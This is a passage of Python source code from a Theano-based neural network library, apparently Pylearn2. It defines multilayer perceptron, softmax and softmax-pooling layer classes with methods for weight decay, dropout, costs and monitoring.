class. Layer subclasses should add their own docstring explaining the subclass-specific format of the ndarray. """ raise NotImplementedError( str(type(self)) + " does not implement " "get_biases (perhaps because the class has no biases).") def set_biases(self, biases): """ Sets the biases of the layer. Parameters ---------- biases : ndarray A numpy ndarray containing the desired biases of the layer. This docstring is provided by the Layer base class. Layer subclasses should add their own docstring explaining the subclass-specific format of the ndarray. """ raise NotImplementedError( str(type(self)) + " does not implement " "set_biases (perhaps because the class has no biases).") def get_weights_format(self): """ Returns a description of how to interpret the weights of the layer. Returns ------- format: tuple Either ('v', 'h') or ('h', 'v'). ('v', 'h') means a weight matrix of shape (num visible units, num hidden units), while ('h', 'v') means the transpose of it. """ raise NotImplementedError def get_weight_decay(self, coeff): """ Provides an expression for a squared L2 penalty on the weights. Parameters ---------- coeff : float or tuple The coefficient on the weight decay penalty for this layer. This docstring is provided by the Layer base class. Individual Layer subclasses should add their own docstring explaining the format of `coeff` for that particular layer. For most ordinary layers, `coeff` is a single float to multiply by the weight decay term. Layers containing many pieces may take a tuple or nested tuple of floats, and should explain the semantics of the different elements of the tuple. Returns ------- weight_decay : theano.gof.Variable An expression for the weight decay penalty term for this layer. """ raise NotImplementedError( str(type(self)) + " does not implement get_weight_decay.") def get_l1_weight_decay(self, coeff): """ Provides an expression for an L1 penalty on the weights. Parameters ---------- coeff : float or tuple The coefficient on the L1 weight decay penalty for this layer. This docstring is provided by the Layer base class. Individual Layer subclasses should add their own docstring explaining the format of `coeff` for that particular layer. For most ordinary layers, `coeff` is a single float to multiply by the weight decay term. Layers containing many pieces may take a tuple or nested tuple of floats, and should explain the semantics of the different elements of the tuple. Returns ------- weight_decay : theano.gof.Variable An expression for the L1 weight decay penalty term for this layer. """ raise NotImplementedError( str(type(self)) + " does not implement get_l1_weight_decay.") def set_input_space(self, space): """ Tells the layer to prepare for input formatted according to the given space. Parameters ---------- space : Space The Space the input to this layer will lie in. Notes ----- This usually resets parameters. """ raise NotImplementedError( str(type(self)) + " does not implement set_input_space.") class MLP(Layer): """ A multilayer perceptron. Note that it's possible for an entire MLP to be a single layer of a larger MLP. Parameters ---------- layers : list A list of Layer objects. The final layer specifies the output space of this MLP. batch_size : int, optional If not specified then must be a positive integer. Mostly useful if one of your layers involves a Theano op like convolution that requires a hard-coded batch size. nvis : int, optional Number of "visible units" (input units). Equivalent to specifying `input_space=VectorSpace(dim=nvis)`. Note that certain methods require a different type of input space (e.g. a Conv2Dspace in the case of convnets). Use the input_space parameter in such cases. Should be None if the MLP is part of another MLP. input_space : Space object, optional A Space specifying the kind of input the MLP accepts. If None, input space is specified by nvis. Should be None if the MLP is part of another MLP. input_source : string or (nested) tuple of strings, optional A (nested) tuple of strings specifiying the input sources this MLP accepts. The structure should match that of input_space. The default is 'features'. Note that this argument is ignored when the MLP is nested. target_source : string or (nested) tuple of strings, optional A (nested) tuple of strings specifiying the target sources this MLP accepts. The structure should match that of target_space. The default is 'targets'. Note that this argument is ignored when the MLP is nested. layer_name : name of the MLP layer. Should be None if the MLP is not part of another MLP. seed : WRITEME monitor_targets : bool, optional Default: True If true, includes monitoring channels that are functions of the targets. This can be disabled to allow monitoring on monitoring datasets that do not include targets. kwargs : dict Passed on to the superclass. """ def __init__(self, layers, batch_size=None, input_space=None, input_source='features', target_source='targets', nvis=None, seed=None, layer_name=None, monitor_targets=True, **kwargs): super(MLP, self).__init__(**kwargs) self.seed = seed assert isinstance(layers, list) assert all(isinstance(layer, Layer) for layer in layers) assert len(layers) >= 1 self.layer_name = layer_name self.layer_names = set() for layer in layers: assert layer.get_mlp() is None if layer.layer_name in self.layer_names: raise ValueError("MLP.__init__ given two or more layers " "with same name: " + layer.layer_name) layer.set_mlp(self) self.layer_names.add(layer.layer_name) self.layers = layers self.batch_size = batch_size self.force_batch_size = batch_size self._input_source = input_source self._target_source = target_source self.monitor_targets = monitor_targets if input_space is not None or nvis is not None: self._nested = False self.setup_rng() # check if the layer_name is None (the MLP is the outer MLP) assert layer_name is None if nvis is not None: input_space = VectorSpace(nvis) # Check whether the input_space and input_source structures match try: DataSpecsMapping((input_space, input_source)) except ValueError: raise ValueError("The structures of `input_space`, %s, and " "`input_source`, %s do not match. If you " "specified a CompositeSpace as an input, " "be sure to specify the data sources as well." % (input_space, input_source)) self.input_space = input_space self._update_layer_input_spaces() else: self._nested = True self.freeze_set = set([]) @property def input_source(self): assert not self._nested, "A nested MLP does not have an input source" return self._input_source @property def target_source(self): assert not self._nested, "A nested MLP does not have a target source" return self._target_source def setup_rng(self): """ .. todo:: WRITEME """ assert not self._nested, "Nested MLPs should use their parent's RNG" if self.seed is None: self.seed = [2013, 1, 4] self.rng = np.random.RandomState(self.seed) @wraps(Layer.get_default_cost) def get_default_cost(self): return Default() @wraps(Layer.get_output_space) def get_output_space(self): return self.layers[-1].get_output_space() @wraps(Layer.get_target_space) def get_target_space(self): return self.layers[-1].get_target_space() @wraps(Layer.set_input_space) def set_input_space(self, space): if hasattr(self, "mlp"): #assert self._nested self.input_space = self.mlp.input_space self.rng = self.mlp.rng self.batch_size = self.mlp.batch_size else: self.input_space = space self._update_layer_input_spaces() def _update_layer_input_spaces(self): """ Tells each layer what its input space should be. Notes ----- This usually resets the layer's parameters! """ layers = self.layers try: layers[0].set_input_space(self.get_input_space()) except BadInputSpaceError as e: raise TypeError("Layer 0 (" + str(layers[0]) + " of type " + str(type(layers[0])) + ") does not support the MLP's " + "specified input space (" + str(self.get_input_space()) + " of type " + str(type(self.get_input_space())) + "). Original exception: " + str(e)) for i in xrange(1, len(layers)): layers[i].set_input_space(layers[i - 1].get_output_space()) def add_layers(self, layers): """ Add new layers on top of the existing hidden layers Parameters ---------- layers : WRITEME """ existing_layers = self.layers assert len(existing_layers) > 0 for layer in layers: assert layer.get_mlp() is None layer.set_mlp(self) # In the case of nested MLPs, input/output spaces may have not yet # been initialized if not self._nested or hasattr(self, 'input_space'): layer.set_input_space(existing_layers[-1].get_output_space()) existing_layers.append(layer) assert layer.layer_name not in self.layer_names self.layer_names.add(layer.layer_name) def freeze(self, parameter_set): """ Freezes some of the parameters (new theano functions that implement learning will not use them; existing theano functions will continue to modify them). Parameters ---------- parameter_set : set Set of parameters to freeze. """ self.freeze_set = self.freeze_set.union(parameter_set) @wraps(Layer.get_monitoring_channels) def get_monitoring_channels(self, data): # if the MLP is the outer MLP \ # (ie MLP is not contained in another structure) if self.monitor_targets: X, Y = data else: X = data Y = None state = X rval = self.get_layer_monitoring_channels(state_below=X, targets=Y) return rval @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): rval = OrderedDict() state = state_below for layer in self.layers: # We don't go through all the inner layers recursively state_below = state state = layer.fprop(state) args = [state_below, state] if layer is self.layers[-1] and targets is not None: args.append(targets) ch = layer.get_layer_monitoring_channels(*args) if not isinstance(ch, OrderedDict): raise TypeError(str((type(ch), layer.layer_name))) for key in ch: value = ch[key] doc = get_monitor_doc(value) if doc is None: doc = str(type(layer)) + \ ".get_monitoring_channels_from_state did" + \ " not provide any further documentation for" + \ " this channel." if layer.layer_name is not None: doc = 'This channel came from a layer called "' + \ layer.layer_name + '" of an MLP.\n' + doc else: doc = 'This channel came from a pickled layer' + \ ' of an MLP.\n' + doc layer.layer_name = "pickled_pretrained" value.__doc__ = doc rval[layer.layer_name + '_' + key] = value return rval def get_monitoring_data_specs(self): """ Returns data specs requiring both inputs and targets. Returns ------- data_specs: TODO The data specifications for both inputs and targets. """ if not self.monitor_targets: return (self.get_input_space(), self.get_input_source()) space = CompositeSpace((self.get_input_space(), self.get_target_space())) source = (self.get_input_source(), self.get_target_source()) return (space, source) @wraps(Layer.get_params) def get_params(self): if not hasattr(self, "input_space"): raise AttributeError("Input space has not been provided.") rval = [] for layer in self.layers: for param in layer.get_params(): if param.name is None: logger.info(type(layer)) layer_params = layer.get_params() assert not isinstance(layer_params, set) for param in layer_params: if param not in rval: rval.append(param) rval = [elem for elem in rval if elem not in self.freeze_set] assert all([elem.name is not None for elem in rval]) return rval @wraps(Layer.get_weight_decay) def get_weight_decay(self, coeffs): # check the case where coeffs is a scalar if not hasattr(coeffs, '__iter__'): coeffs = [coeffs] * len(self.layers) layer_costs = [] for layer, coeff in safe_izip(self.layers, coeffs): if coeff != 0.: layer_costs += [layer.get_weight_decay(coeff)] if len(layer_costs) == 0: return T.constant(0, dtype=config.floatX) total_cost = reduce(operator.add, layer_costs) return total_cost @wraps(Layer.get_l1_weight_decay) def get_l1_weight_decay(self, coeffs): # check the case where coeffs is a scalar if not hasattr(coeffs, '__iter__'): coeffs = [coeffs] * len(self.layers) layer_costs = [] for layer, coeff in safe_izip(self.layers, coeffs): if coeff != 0.: layer_costs += [layer.get_l1_weight_decay(coeff)] if len(layer_costs) == 0: return T.constant(0, dtype=config.floatX) total_cost = reduce(operator.add, layer_costs) return total_cost @wraps(Model.set_batch_size) def set_batch_size(self, batch_size): self.batch_size = batch_size self.force_batch_size = batch_size for layer in self.layers: layer.set_batch_size(batch_size) @wraps(Layer._modify_updates) def _modify_updates(self, updates): for layer in self.layers: layer.modify_updates(updates) @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): return get_lr_scalers_from_layers(self) @wraps(Layer.get_weights) def get_weights(self): if not hasattr(self, "input_space"): raise AttributeError("Input space has not been provided.") return self.layers[0].get_weights() @wraps(Layer.get_weights_view_shape) def get_weights_view_shape(self): if not hasattr(self, "input_space"): raise AttributeError("Input space has not been provided.") return self.layers[0].get_weights_view_shape() @wraps(Layer.get_weights_format) def get_weights_format(self): if not hasattr(self, "input_space"): raise AttributeError("Input space has not been provided.") return self.layers[0].get_weights_format() @wraps(Layer.get_weights_topo) def get_weights_topo(self): if not hasattr(self, "input_space"): raise AttributeError("Input space has not been provided.") return self.layers[0].get_weights_topo() def dropout_fprop(self, state_below, default_input_include_prob=0.5, input_include_probs=None, default_input_scale=2., input_scales=None, per_example=True): """ Returns the output of the MLP, when applying dropout to the input and intermediate layers. Parameters ---------- state_below : WRITEME The input to the MLP default_input_include_prob : WRITEME input_include_probs : WRITEME default_input_scale : WRITEME input_scales : WRITEME per_example : bool, optional Sample a different mask value for every example in a batch. Defaults to `True`. If `False`, sample one mask per mini-batch. Notes ----- Each input to each layer is randomly included or excluded for each example. The probability of inclusion is independent for each input and each example. Each layer uses `default_input_include_prob` unless that layer's name appears as a key in input_include_probs, in which case the input inclusion probability is given by the corresponding value. Each feature is also multiplied by a scale factor. The scale factor for each layer's input scale is determined by the same scheme as the input probabilities. """ if input_include_probs is None: input_include_probs = {} if input_scales is None: input_scales = {} self._validate_layer_names(list(input_include_probs.keys())) self._validate_layer_names(list(input_scales.keys())) theano_rng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1)) for layer in self.layers: layer_name = layer.layer_name if layer_name in input_include_probs: include_prob = input_include_probs[layer_name] else: include_prob = default_input_include_prob if layer_name in input_scales: scale = input_scales[layer_name] else: scale = default_input_scale state_below = self.apply_dropout( state=state_below, include_prob=include_prob, theano_rng=theano_rng, scale=scale, mask_value=layer.dropout_input_mask_value, input_space=layer.get_input_space(), per_example=per_example ) state_below = layer.fprop(state_below) return state_below def masked_fprop(self, state_below, mask, masked_input_layers=None, default_input_scale=2., input_scales=None): """ Forward propagate through the network with a dropout mask determined by an integer (the binary representation of which is used to generate the mask). Parameters ---------- state_below : tensor_like The (symbolic) output state of the layer below. mask : int An integer indexing possible binary masks. It should be < 2 ** get_total_input_dimension(masked_input_layers) and greater than or equal to 0. masked_input_layers : list, optional A list of layer names to mask. If `None`, the input to all layers (including the first hidden layer) is masked. default_input_scale : float, optional The amount to scale inputs in masked layers that do not appear in `input_scales`. Defaults to 2. input_scales : dict, optional A dictionary mapping layer names to floating point numbers indicating how much to scale input to a given layer. Returns ------- masked_output : tensor_like The output of the forward propagation of the masked network. """ if input_scales is not None: self._validate_layer_names(input_scales) else: input_scales = {} if any(n not in masked_input_layers for n in input_scales): layers = [n for n in input_scales if n not in masked_input_layers] raise ValueError("input scales provided for layer not masked: " % ", ".join(layers)) if masked_input_layers is not None: self._validate_layer_names(masked_input_layers) else: masked_input_layers = self.layer_names num_inputs = self.get_total_input_dimension(masked_input_layers) assert mask >= 0, "Mask must be a non-negative integer." if mask > 0 and math.log(mask, 2) > num_inputs: raise ValueError("mask value of %d too large; only %d " "inputs to layers (%s)" % (mask, num_inputs, ", ".join(masked_input_layers))) def binary_string(x, length, dtype): """ Create the binary representation of an integer `x`, padded to `length`, with dtype `dtype`. Parameters ---------- length : WRITEME dtype : WRITEME Returns ------- WRITEME """ s = np.empty(length, dtype=dtype) for i in range(length - 1, -1, -1): if x // (2 ** i) == 1: s[i] = 1 else: s[i] = 0 x = x % (2 ** i) return s remaining_mask = mask for layer in self.layers: if layer.layer_name in masked_input_layers: scale = input_scales.get(layer.layer_name, default_input_scale) n_inputs = layer.get_input_space().get_total_dimension() layer_dropout_mask = remaining_mask & (2 ** n_inputs - 1) remaining_mask >>= n_inputs mask = binary_string(layer_dropout_mask, n_inputs, 'uint8') shape = layer.get_input_space().get_origin_batch(1).shape s_mask = T.as_tensor_variable(mask).reshape(shape) if layer.dropout_input_mask_value == 0: state_below = state_below * s_mask * scale else: state_below = T.switch(s_mask, state_below * scale, layer.dropout_input_mask_value) state_below = layer.fprop(state_below) return state_below def _validate_layer_names(self, layers): """ .. todo:: WRITEME """ if any(layer not in self.layer_names for layer in layers): unknown_names = [layer for layer in layers if layer not in self.layer_names] raise ValueError("MLP has no layer(s) named %s" % ", ".join(unknown_names)) def get_total_input_dimension(self, layers): """ Get the total number of inputs to the layers whose names are listed in `layers`. Used for computing the total number of dropout masks. Parameters ---------- layers : WRITEME Returns ------- WRITEME """ self._validate_layer_names(layers) total = 0 for layer in self.layers: if layer.layer_name in layers: total += layer.get_input_space().get_total_dimension() return total @wraps(Layer.fprop) def fprop(self, state_below, return_all=False): if not hasattr(self, "input_space"): raise AttributeError("Input space has not been provided.") rval = self.layers[0].fprop(state_below) rlist = [rval] for layer in self.layers[1:]: rval = layer.fprop(rval) rlist.append(rval) if return_all: return rlist return rval def apply_dropout(self, state, include_prob, scale, theano_rng, input_space, mask_value=0, per_example=True): """ .. todo:: WRITEME Parameters ---------- state: WRITEME include_prob : WRITEME scale : WRITEME theano_rng : WRITEME input_space : WRITEME mask_value : WRITEME per_example : bool, optional Sample a different mask value for every example in a batch. Defaults to `True`. If `False`, sample one mask per mini-batch. """ if include_prob in [None, 1.0, 1]: return state assert scale is not None if isinstance(state, tuple): return tuple(self.apply_dropout(substate, include_prob, scale, theano_rng, mask_value) for substate in state) # TODO: all of this assumes that if it's not a tuple, it's # a dense tensor. It hasn't been tested with sparse types. # A method to format the mask (or any other values) as # the given symbolic type should be added to the Spaces # interface. if per_example: mask = theano_rng.binomial(p=include_prob, size=state.shape, dtype=state.dtype) else: batch = input_space.get_origin_batch(1) mask = theano_rng.binomial(p=include_prob, size=batch.shape, dtype=state.dtype) rebroadcast = T.Rebroadcast(*zip(xrange(batch.ndim), [s == 1 for s in batch.shape])) mask = rebroadcast(mask) if mask_value == 0: rval = state * mask * scale else: rval = T.switch(mask, state * scale, mask_value) return T.cast(rval, state.dtype) @wraps(Layer.cost) def cost(self, Y, Y_hat): return self.layers[-1].cost(Y, Y_hat) @wraps(Layer.cost_matrix) def cost_matrix(self, Y, Y_hat): return self.layers[-1].cost_matrix(Y, Y_hat) @wraps(Layer.cost_from_cost_matrix) def cost_from_cost_matrix(self, cost_matrix): return self.layers[-1].cost_from_cost_matrix(cost_matrix) def cost_from_X(self, data): """ Computes self.cost, but takes data=(X, Y) rather than Y_hat as an argument. This is just a wrapper around self.cost that computes Y_hat by calling Y_hat = self.fprop(X) Parameters ---------- data : WRITEME """ self.cost_from_X_data_specs()[0].validate(data) X, Y = data Y_hat = self.fprop(X) return self.cost(Y, Y_hat) def cost_from_X_data_specs(self): """ Returns the data specs needed by cost_from_X. This is useful if cost_from_X is used in a MethodCost. """ space = CompositeSpace((self.get_input_space(), self.get_target_space())) source = (self.get_input_source(), self.get_target_source()) return (space, source) def __str__(self): """ Summarizes the MLP by printing the size and format of the input to all layers. Feel free to add reasonably concise info as needed. """ rval = [] for layer in self.layers: rval.append(layer.layer_name) input_space = layer.get_input_space() rval.append('\tInput space: ' + str(input_space)) rval.append('\tTotal input dimension: ' + str(input_space.get_total_dimension())) rval = '\n'.join(rval) return rval class Softmax(Layer): """ A layer that can apply an optional affine transformation to vectorial inputs followed by a softmax nonlinearity. Parameters ---------- n_classes : int Number of classes for softmax targets. layer_name : string Name of Softmax layers. irange : float If specified, initialized each weight randomly in U(-irange, irange). istdev : float If specified, initialize each weight randomly from N(0,istdev). sparse_init : int If specified, initial sparse_init number of weights for each unit from N(0,1). W_lr_scale : float Scale for weight learning rate. b_lr_scale : float Scale for bias learning rate. max_row_norm : float Maximum norm for a row of the weight matrix. no_affine : boolean If True, softmax nonlinearity is applied directly to inputs. max_col_norm : float Maximum norm for a column of the weight matrix. init_bias_target_marginals : dataset Take the probability distribution of the targets into account to intelligently initialize biases. binary_target_dim : int, optional If your targets are class labels (i.e. a binary vector) then set the number of targets here so that an IndexSpace of the proper dimension can be used as the target space. This allows the softmax to compute the cost much more quickly than if it needs to convert the targets into a VectorSpace. With binary_target_dim>1, you can use one layer to simultaneously predict a bag of words (i.e. order is not important, the same element can be included more than once). non_redundant : bool If True, learns only n_classes - 1 biases and weight vectors """ def __init__(self, n_classes, layer_name, irange=None, istdev=None, sparse_init=None, W_lr_scale=None, b_lr_scale=None, max_row_norm=None, no_affine=False, max_col_norm=None, init_bias_target_marginals=None, binary_target_dim=None, non_redundant=False): super(Softmax, self).__init__() if max_col_norm is not None: self.extensions.append(MaxL2FilterNorm(max_col_norm)) if non_redundant: if init_bias_target_marginals: msg = ("init_bias_target_marginals currently only works " "with the overcomplete parameterization.") raise NotImplementedError(msg) if isinstance(W_lr_scale, str): W_lr_scale = float(W_lr_scale) self.__dict__.update(locals()) del self.self del self.init_bias_target_marginals if not isinstance(n_classes, py_integer_types): raise TypeError("n_classes is of type %s, but must be integer" % type(n_classes)) if binary_target_dim is not None: assert isinstance(binary_target_dim, py_integer_types) self._has_binary_target = True self._target_space = IndexSpace(dim=binary_target_dim, max_labels=n_classes) else: self._has_binary_target = False self.output_space = VectorSpace(n_classes) if not no_affine: self.b = sharedX(np.zeros((n_classes - self.non_redundant,)), name='softmax_b') if init_bias_target_marginals: y = init_bias_target_marginals.y if init_bias_target_marginals.y_labels is None: marginals = y.mean(axis=0) else: # compute class frequencies if np.max(y.shape) != np.prod(y.shape): raise AssertionError("Use of " "`init_bias_target_marginals` " "requires that each example has " "a single label.") marginals = np.bincount(y.flat) / float(y.shape[0]) assert marginals.ndim == 1 b = pseudoinverse_softmax_numpy(marginals).astype(self.b.dtype) assert b.ndim == 1 assert b.dtype == self.b.dtype self.b.set_value(b) else: assert init_bias_target_marginals is None def __setstate__(self, state): super(Softmax, self).__setstate__(state) # Patch old pickle files if not hasattr(self, 'non_redundant'): self.non_redundant = False if not hasattr(self, 'mask_weights'): self.mask_weights = None @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): rval = OrderedDict() if self.W_lr_scale is not None: assert isinstance(self.W_lr_scale, float) rval[self.W] = self.W_lr_scale if not hasattr(self, 'b_lr_scale'): self.b_lr_scale = None if self.b_lr_scale is not None: assert isinstance(self.b_lr_scale, float) rval[self.b] = self.b_lr_scale return rval @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): rval = OrderedDict() if not self.no_affine: W = self.W assert W.ndim == 2 sq_W = T.sqr(W) row_norms = T.sqrt(sq_W.sum(axis=1)) col_norms = T.sqrt(sq_W.sum(axis=0)) rval.update(OrderedDict([('row_norms_min', row_norms.min()), ('row_norms_mean', row_norms.mean()), ('row_norms_max', row_norms.max()), ('col_norms_min', col_norms.min()), ('col_norms_mean', col_norms.mean()), ('col_norms_max', col_norms.max()), ])) if (state_below is not None) or (state is not None): if state is None: state = self.fprop(state_below) mx = state.max(axis=1) rval.update(OrderedDict([('mean_max_class', mx.mean()), ('max_max_class', mx.max()), ('min_max_class', mx.min())])) if (targets is not None): if ((not self._has_binary_target) or self.binary_target_dim == 1): # if binary_target_dim>1, the misclass rate is ill-defined y_hat = T.argmax(state, axis=1) y = (targets.reshape(y_hat.shape) if self._has_binary_target else T.argmax(targets, axis=1)) misclass = T.neq(y, y_hat).mean() misclass = T.cast(misclass, config.floatX) rval['misclass'] = misclass rval['nll'] = self.cost(Y_hat=state, Y=targets) return rval @wraps(Layer.set_input_space) def set_input_space(self, space): self.input_space = space if not isinstance(space, Space): raise TypeError("Expected Space, got " + str(space) + " of type " + str(type(space))) self.input_dim = space.get_total_dimension() self.needs_reformat = not isinstance(space, VectorSpace) if self.no_affine: desired_dim = self.n_classes - self.non_redundant assert self.input_dim == desired_dim else: desired_dim = self.input_dim self.desired_space = VectorSpace(desired_dim) if not self.needs_reformat: assert self.desired_space == self.input_space rng = self.mlp.rng if self.no_affine: self._params = [] else: num_cols = self.n_classes - self.non_redundant if self.irange is not None: assert self.istdev is None assert self.sparse_init is None W = rng.uniform(-self.irange, self.irange, (self.input_dim, num_cols)) elif self.istdev is not None: assert self.sparse_init is None W = rng.randn(self.input_dim, num_cols) * self.istdev else: assert self.sparse_init is not None W = np.zeros((self.input_dim, num_cols)) for i in xrange(num_cols): for j in xrange(self.sparse_init): idx = rng.randint(0, self.input_dim) while W[idx, i] != 0.: idx = rng.randint(0, self.input_dim) W[idx, i] = rng.randn() self.W = sharedX(W, 'softmax_W') self._params = [self.b, self.W] @wraps(Layer.get_weights_topo) def get_weights_topo(self): if not isinstance(self.input_space, Conv2DSpace): raise NotImplementedError() desired = self.W.get_value().T ipt = self.desired_space.np_format_as(desired, self.input_space) rval = Conv2DSpace.convert_numpy(ipt, self.input_space.axes, ('b', 0, 1, 'c')) return rval @wraps(Layer.get_weights) def get_weights(self): if not isinstance(self.input_space, VectorSpace): raise NotImplementedError() return self.W.get_value() @wraps(Layer.set_weights) def set_weights(self, weights): self.W.set_value(weights) @wraps(Layer.set_biases) def set_biases(self, biases): self.b.set_value(biases) @wraps(Layer.get_biases) def get_biases(self): return self.b.get_value() @wraps(Layer.get_weights_format) def get_weights_format(self): return ('v', 'h') @wraps(Layer.fprop) def fprop(self, state_below): self.input_space.validate(state_below) if self.needs_reformat: state_below = self.input_space.format_as(state_below, self.desired_space) self.desired_space.validate(state_below) assert state_below.ndim == 2 if not hasattr(self, 'no_affine'): self.no_affine = False if self.no_affine: Z = state_below else: assert self.W.ndim == 2 b = self.b Z = T.dot(state_below, self.W) + b if self.non_redundant: zeros = T.alloc(0., Z.shape[0], 1) Z = T.concatenate((zeros, Z), axis=1) rval = T.nnet.softmax(Z) for value in get_debug_values(rval): if self.mlp.batch_size is not None: assert value.shape[0] == self.mlp.batch_size return rval def _cost(self, Y, Y_hat): z = arg_of_softmax(Y_hat) assert z.ndim == 2 z = z - z.max(axis=1).dimshuffle(0, 'x') log_prob = z - T.log(T.exp(z).sum(axis=1).dimshuffle(0, 'x')) # we use sum and not mean because this is really one variable per row if self._has_binary_target: # The following code is the equivalent of accessing log_prob by the # indices in Y, but it is written such that the computation can # happen on the GPU rather than CPU. flat_Y = Y.flatten() flat_Y.name = 'flat_Y' flat_log_prob = log_prob.flatten() flat_log_prob.name = 'flat_log_prob' range_ = T.arange(Y.shape[0]) if self.binary_target_dim > 1: # because of an error in optimization (local_useless_tile) # when tiling with (1, 1) range_ = T.tile(range_.dimshuffle(0, 'x'), (1, self.binary_target_dim)).flatten() flat_indices = flat_Y + range_ * self.n_classes flat_indices.name = 'flat_indices' log_prob_of = flat_log_prob[flat_indices].reshape(Y.shape, ndim=2) log_prob_of.name = 'log_prob_of' else: log_prob_of = (Y * log_prob) return log_prob_of @wraps(Layer.cost) def cost(self, Y, Y_hat): log_prob_of = self._cost(Y, Y_hat).sum(axis=1) assert log_prob_of.ndim == 1 rval = log_prob_of.mean() return - rval @wraps(Layer.cost_matrix) def cost_matrix(self, Y, Y_hat): log_prob_of = self._cost(Y, Y_hat) if self._has_binary_target: flat_Y = Y.flatten() flat_matrix = T.alloc(0, (Y.shape[0] * log_prob_of.shape[1])) flat_indices = flat_Y + T.extra_ops.repeat( T.arange(Y.shape[0]) * log_prob_of.shape[1], Y.shape[1] ) log_prob_of = T.set_subtensor(flat_matrix[flat_indices], flat_Y) return -log_prob_of @wraps(Layer.get_weight_decay) def get_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') return coeff * T.sqr(self.W).sum() @wraps(Layer.get_l1_weight_decay) def get_l1_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W = self.W return coeff * abs(W).sum() @wraps(Layer._modify_updates) def _modify_updates(self, updates): if self.no_affine: return if self.max_row_norm is not None: W = self.W if W in updates: updated_W = updates[W] row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1)) desired_norms = T.clip(row_norms, 0, self.max_row_norm) scales = desired_norms / (1e-7 + row_norms) updates[W] = updated_W * scales.dimshuffle(0, 'x') class SoftmaxPool(Layer): """ A hidden layer that uses the softmax function to do max pooling over groups of units. When the pooling size is 1, this reduces to a standard sigmoidal MLP layer. Parameters ---------- detector_layer_dim : WRITEME layer_name : WRITEME pool_size : WRITEME irange : WRITEME sparse_init : WRITEME sparse_stdev : WRITEME include_prob : float, optional Probability of including a weight element in the set of weights initialized to U(-irange, irange). If not included it is initialized to 0. init_bias : WRITEME W_lr_scale : WRITEME b_lr_scale : WRITEME mask_weights : WRITEME max_col_norm : WRITEME """ def __init__(self, detector_layer_dim, layer_name, pool_size=1, irange=None, sparse_init=None, sparse_stdev=1., include_prob=1.0, init_bias=0., W_lr_scale=None, b_lr_scale=None, mask_weights=None, max_col_norm=None): super(SoftmaxPool, self).__init__() self.__dict__.update(locals()) del self.self self.b = sharedX(np.zeros((self.detector_layer_dim,)) + init_bias, name=(layer_name + '_b')) @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): if not hasattr(self, 'W_lr_scale'): self.W_lr_scale = None if not hasattr(self, 'b_lr_scale'): self.b_lr_scale = None rval = OrderedDict() if self.W_lr_scale is not None: W, = self.transformer.get_params() rval[W] = self.W_lr_scale if self.b_lr_scale is not None: rval[self.b] = self.b_lr_scale return rval @wraps(Layer.set_input_space) def set_input_space(self, space): self.input_space = space if isinstance(space, VectorSpace): self.requires_reformat = False self.input_dim = space.dim else: self.requires_reformat = True self.input_dim = space.get_total_dimension() self.desired_space = VectorSpace(self.input_dim) if not (self.detector_layer_dim % self.pool_size == 0): raise ValueError("detector_layer_dim = %d, pool_size = %d. " "Should be divisible but remainder is %d" % (self.detector_layer_dim, self.pool_size, self.detector_layer_dim % self.pool_size)) self.h_space = VectorSpace(self.detector_layer_dim) self.pool_layer_dim = self.detector_layer_dim / self.pool_size self.output_space = VectorSpace(self.pool_layer_dim) rng = self.mlp.rng if self.irange is not None: assert self.sparse_init is None W = rng.uniform(-self.irange, self.irange, (self.input_dim, self.detector_layer_dim)) * \ (rng.uniform(0., 1., (self.input_dim, self.detector_layer_dim)) < self.include_prob) else: assert self.sparse_init is not None W = np.zeros((self.input_dim, self.detector_layer_dim)) def mask_rejects(idx, i): if self.mask_weights is None: return False return self.mask_weights[idx, i] == 0. for i in xrange(self.detector_layer_dim): assert self.sparse_init <= self.input_dim for j in xrange(self.sparse_init): idx = rng.randint(0, self.input_dim) while W[idx, i] != 0 or mask_rejects(idx, i): idx = rng.randint(0, self.input_dim) W[idx, i] = rng.randn() W *= self.sparse_stdev W = sharedX(W) W.name = self.layer_name + '_W' self.transformer = MatrixMul(W) W, = self.transformer.get_params() assert W.name is not None if self.mask_weights is not None: expected_shape = (self.input_dim, self.detector_layer_dim) if expected_shape != self.mask_weights.shape: raise ValueError("Expected mask with shape " + str(expected_shape) + " but got " + str(self.mask_weights.shape)) self.mask = sharedX(self.mask_weights) @wraps(Layer._modify_updates) def _modify_updates(self, updates): if self.mask_weights is not None: W, = self.transformer.get_params() if W in updates: updates[W] = updates[W] * self.mask if self.max_col_norm is not None: W, = self.transformer.get_params() if W in updates: updated_W = updates[W] col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0)) desired_norms = T.clip(col_norms, 0, self.max_col_norm) updates[W] = updated_W * (desired_norms / (1e-7 + col_norms)) @wraps(Layer.get_params) def get_params(self): assert self.b.name is not None W, = self.transformer.get_params() assert W.name is not None rval = self.transformer.get_params() assert not isinstance(rval, set) rval = list(rval) assert self.b not in rval rval.append(self.b) return rval @wraps(Layer.get_weight_decay) def get_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W, = self.transformer.get_params() return coeff * T.sqr(W).sum() @wraps(Layer.get_l1_weight_decay) def get_l1_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W, = self.transformer.get_params() return coeff * abs(W).sum() @wraps(Layer.get_weights) def get_weights(self): if self.requires_reformat: # This is not really an unimplemented case. # We actually don't know how to format the weights # in design space. We got the data in topo space # and we don't have access to the dataset raise NotImplementedError() W, = self.transformer.get_params() return W.get_value() @wraps(Layer.set_weights) def set_weights(self, weights): W, = self.transformer.get_params() W.set_value(weights) @wraps(Layer.set_biases) def set_biases(self, biases): """ .. todo:: WRITEME """ self.b.set_value(biases) @wraps(Layer.get_biases) def get_biases(self): return self.b.get_value() @wraps(Layer.get_weights_format) def get_weights_format(self): return ('v', 'h') 